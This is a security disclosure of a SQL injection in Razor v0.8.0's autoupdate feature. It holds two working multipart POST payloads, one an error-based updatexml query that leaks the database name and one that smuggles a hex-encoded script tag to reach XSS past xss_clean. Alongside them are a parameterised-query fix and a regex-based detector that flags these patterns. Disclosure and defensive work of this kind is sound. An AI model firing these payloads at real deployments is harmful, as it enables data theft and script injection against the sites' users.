A SQL injection vulnerability in Razor v0.8.0.

In https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/controllers/manage/autoupdate.php#L187, `$description` is controlled by users and has few restrictions on its format:
```php
$this->form_validation->set_rules('description', lang('v_man_au_updateLog'), 'trim|required|xss_clean');
$this->form_validation->set_rules('versionid', lang('v_man_au_versionID'), 'trim|required|xss_clean|callback_versionid_check');
//......
$description = $this->input->post('description');
$versionid = $this->input->post('versionid');
$versioninfo = $this->channel->getversionid($cp_id, $versionid, $upinfo);
if ($versioninfo) {
    $isupdate = $this->channel->updateapk($userid, $cp_id, $description, $updateurl, $versionid, $upinfo);
    if ($isupdate) {
        $this->data['apkinfo'] = $this->channel->getakpinfo($userid, $cp_id);
        $this->load->view('autoupdate/updateandrlist', $this->data);
    }
}
```
In the `ChannelModel::updateapk` method, `$description` is interpolated into the SQL string directly (https://github.com/cobub/razor/blob/2c991aff4a9c83f99e77a03e26056715706f15c0/web/application/models/channelmodel.php#L482):
```php
$sql = "update ".$this->db->dbprefix('channel_product')." set updateurl ='$updateurl' , description='$description' ,version='$versionid',date='$date'
        where cp_id = $cp_id and user_id = $userid";
$this->db->query($sql);
$affect = $this->db->affected_rows();
```
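As an added example (this is not Razor's own code or the upstream patch), the same update written with CodeIgniter's query bindings, so that `$description` and the other request-controlled values are passed to the driver separately and never become part of the SQL text. The `$date` assignment and the boolean return value are assumptions based on the surrounding excerpt; the method signature mirrors the call in the controller above.

```php
<?php
// Added example, not the project's code: a hardened rewrite of the
// ChannelModel::updateapk query from the report. Every user-influenced
// value goes through CodeIgniter's query bindings ($this->db->query($sql, $binds)),
// which escapes and quotes each value, so a single quote inside $description
// cannot terminate the string literal. Assumes a CodeIgniter model context
// where $this->db is the loaded database driver.

class ChannelModel extends CI_Model
{
    public function updateapk($userid, $cp_id, $description, $updateurl, $versionid, $upinfo)
    {
        $date = date('Y-m-d H:i:s'); // assumption: the original sets a timestamp here

        // Vulnerable form from the report, for comparison (do not use):
        //   "... set description='$description' ... where cp_id = $cp_id and user_id = $userid"
        //
        // Hardened form: '?' placeholders, no quotes around them (the driver adds them),
        // values supplied as a separate array in the same order.
        $sql = 'UPDATE ' . $this->db->dbprefix('channel_product')
             . ' SET updateurl = ?, description = ?, version = ?, date = ?'
             . ' WHERE cp_id = ? AND user_id = ?';

        // cp_id and user_id were interpolated unquoted in the original; besides
        // binding them, cast them so a non-numeric value cannot alter the WHERE clause.
        $this->db->query($sql, array(
            $updateurl,
            $description,
            $versionid,
            $date,
            (int) $cp_id,
            (int) $userid,
        ));

        // Assumption: the controller only needs to know whether a row changed.
        return $this->db->affected_rows() > 0;
    }
}
```

The equivalent with the Query Builder (`$this->db->where(...)->update('channel_product', $data)`) applies the table prefix and escaping automatically and is the more idiomatic CodeIgniter fix; the bound-query form is shown because it maps line for line onto the original statement. Note that `xss_clean` on the validation rule is an HTML output filter and provides no protection against SQL injection at all; the fix has to be at the query.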
PoC (assuming a product with ID 1 exists):
```http
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......

-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="userfile"; filename="base.apk"
Content-Type: application/octet-stream

......
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="versionid"

1.4.0
-----------------------------4510835592045788119549478332
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '
-----------------------------4510835592045788119549478332--
```
XSS can also be triggered through the manipulated error messages. Because the script tag is supplied as a MySQL hexadecimal literal, the submitted value contains nothing for CodeIgniter's `xss_clean` filter to strip; the database decodes it server-side and reflects it in the error text.
```http
POST /index.php?/manage/autoupdate/uploadapk/1/1 HTTP/1.1
......

-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="userfile"; filename="a.apk"
Content-Type: application/octet-stream

......
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="versionid"

1.5.0
-----------------------------94712324341088669424272486117
Content-Disposition: form-data; name="description"

xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '
-----------------------------94712324341088669424272486117--
```
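As an added example (not part of the original report), a small request-side detector for the error-based pattern used in both PoCs above. It is intended for a WAF rule, a CodeIgniter `pre_controller` hook, or an offline scan of captured POST bodies; it does not fix the bug (the parameterised query does that), it only makes exploitation attempts visible in logs. The field names and sample values are constructed for the demo, reusing the two description payloads shown above.

```php
<?php
// Added example, not the project's code: flag form fields that carry the
// indicators seen in the report's PoCs. Three independent signals are checked
// so that a hit on any one of them is logged with its reason.

function injection_indicators(string $value): array
{
    $hits = [];

    // MySQL error-based primitives: the server echoes the XML argument back
    // inside the error message, which is how the PoC leaks database().
    if (preg_match('/\b(updatexml|extractvalue)\s*\(/i', $value)) {
        $hits[] = 'mysql-error-based-function';
    }

    // A quote immediately followed by a boolean operator: the string-literal break-out.
    if (preg_match("/'\s*(or|and)\s+/i", $value)) {
        $hits[] = 'string-literal-breakout';
    }

    // Hex literals of 8+ digits. Input filters such as xss_clean never see the
    // decoded bytes; MySQL decodes them server-side (0x3c73... is "<scr...").
    if (preg_match('/\b0x[0-9a-f]{8,}\b/i', $value)) {
        $hits[] = 'hex-encoded-literal';
    }

    return $hits;
}

// Returns only the fields that triggered at least one indicator.
function scan_post_fields(array $fields): array
{
    $report = [];
    foreach ($fields as $name => $value) {
        $hits = injection_indicators((string) $value);
        if ($hits) {
            $report[$name] = $hits;
        }
    }
    return $report;
}

// Constructed samples: a benign update note and the two PoC descriptions from the report.
$samples = [
    'benign'  => ['versionid' => '1.4.0', 'description' => "Bug fixes and it's faster"],
    'poc-db'  => ['versionid' => '1.4.0', 'description' => "xxxx' or updatexml(1,concat(0x7e,(select database())),0) or '"],
    'poc-xss' => ['versionid' => '1.5.0', 'description' => "xxxx' or updatexml(1,concat(0x7e,(select 0x3c7363726970743e616c6572742831293c2f7363726970743e)),0) or '"],
];

foreach ($samples as $label => $fields) {
    $report = scan_post_fields($fields);
    printf("%-8s %s\n", $label, $report ? json_encode($report) : 'clean');
}
```

The benign sample passes all three checks (the apostrophe in "it's" is not followed by an operator), `poc-db` trips the first two, and `poc-xss` trips all three. For the XSS path specifically, the complementary mitigations are to stop rendering raw database error messages to users (CodeIgniter's `db_debug` setting) and to HTML-escape the description at output time rather than relying on an input filter.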